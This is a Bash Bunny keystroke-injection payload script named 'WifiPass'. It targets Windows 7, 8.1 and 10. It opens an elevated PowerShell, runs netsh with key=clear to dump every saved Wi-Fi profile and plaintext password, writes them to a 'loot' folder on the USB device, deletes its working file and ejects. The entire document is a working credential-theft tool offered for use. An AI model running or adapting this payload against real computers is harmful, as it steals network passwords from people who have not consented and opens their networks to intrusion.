#!/bin/bash # # Title: WifiPass # Author: TheRoninRunner # Props: illwill # Version: 1.0 # Target: Windows # Description: Uses the power of netsh to get a list of all wifi networks and passwords # stored on the computer. Windows 7 has some weird formatting issues with the # loot file. Tested and working on Windows 7, 8.1, and 10. # Goes through the netsh wlan show profiles and runs each with key=clear, # saving any networks/keys that aren't open or WEP. For any network that # users username and password to log in, you'll get the network name only. # # LEDS: # Blue: Setup # Yellow: Using networks.txt to run through the networks # White: Clean up # Green: Done # LED B #Creates the loot directory mkdir -p /root/udisk/loot/WifiPass #Set up the Bash Bunny and get the networks and computer name ATTACKMODE HID STORAGE Q DELAY 2000 Q GUI Q DELAY 500 Q STRING powershell Q DELAY 2000 Q CTRL-SHIFT ENTER Q DELAY 2000 Q LEFTARROW Q DELAY 200 Q ENTER Q DELAY 1200 Q STRING \$bb \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q ENTER Q DELAY 100 Q STRING \$compname \= \(\$env\:computername\) Q ENTER Q DELAY 100 Q STRING \(netsh wlan show profiles \| Out-File \$bb\\loot\\WifiPass\\networks.txt\) Q ENTER Q DELAY 100 #Types out commands to get the Wifi names and passwords, as well as store them LED Y Q STRING \(\$lines \= Get-Content \$bb\\loot\\WifiPass\\networks.txt\) Q ENTER Q STRING foreach \(\$line in \$lines\) \{ Q ENTER Q STRING \$fields \= \$line -split \'\: \' Q ENTER Q STRING \$names \= \$fields\[1\] Q ENTER Q STRING foreach \(\$name in \$names\)\{ Q ENTER Q STRING \$passwd = netsh wlan show profile \$name key\=clear \| findstr Key Q ENTER Q STRING \$pass \= \$passwd -split \'\: \' Q ENTER Q STRING if \(-Not \(\$pass -eq \1\)\) \{ Q ENTER Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$name Q ENTER Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$pass\[1\] Q ENTER Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \`n Q ENTER Q STRING } Q ENTER Q STRING } Q ENTER Q STRING } Q ENTER Q ENTER Q DELAY 10000 # Eject the USB Safely and remove networks file LED W Q STRING \$Eject \= New-Object -comObject Shell.Application Q ENTER Q DELAY 100 Q STRING \$Eject.NameSpace\(17\).ParseName\(\$bb\).InvokeVerb\(\"Eject\"\) Q ENTER Q DELAY 100 # GTFO Q STRING EXIT Q ENTER #Sync Drive sync rm -f /root/udisk/loot/WifiPass/networks.txt #Trap is clean LED G